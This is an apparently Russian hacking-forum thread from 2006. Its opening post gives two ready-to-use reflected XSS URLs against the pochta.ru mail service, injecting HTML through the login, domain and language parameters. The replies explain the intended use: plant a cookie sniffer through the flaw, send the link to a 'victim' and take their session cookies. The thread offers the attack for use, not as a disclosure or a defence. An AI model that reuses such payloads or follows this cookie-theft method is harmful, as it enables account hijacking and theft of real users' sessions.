2 XSS(passive) на Pochta.ru

Discussion in 'Уязвимости' started by _kREveDKo_, 1 May 2006.

  1. _kREveDKo_

    _kREveDKo_ _kREveDKo_

    Joined:
    4 Dec 2005
    Messages:
    778
    Likes Received:
    620
    Reputations:
    1,040
    http://old.pochta.ru/forgot.php?&lng=ru&login="><h1>XSS</h1>&domain=pochta.ru"><h1>XSS</h1>

    http://www.pochta.ru/?lng=en"><h1>XSS</h1>
     
    #1 _kREveDKo_, 1 May 2006
    1 person likes this.
  2. nike57

    nike57 New Member

    Joined:
    4 May 2006
    Messages:
    11
    Likes Received:
    1
    Reputations:
    1
    Это надо "жертве" отправить или что?
     
    #2 nike57, 6 May 2006
  3. vectorg

    vectorg Противоядие

    Joined:
    7 Aug 2005
    Messages:
    335
    Likes Received:
    140
    Reputations:
    236
    Это надо "жертве" ВПАРИТЬ :D
    т.е. через xss внедряешь сниффер, даёшь "жертве" ссылку, берёшь куки
     
    #3 vectorg, 6 May 2006
(You must log in or sign up to post here.)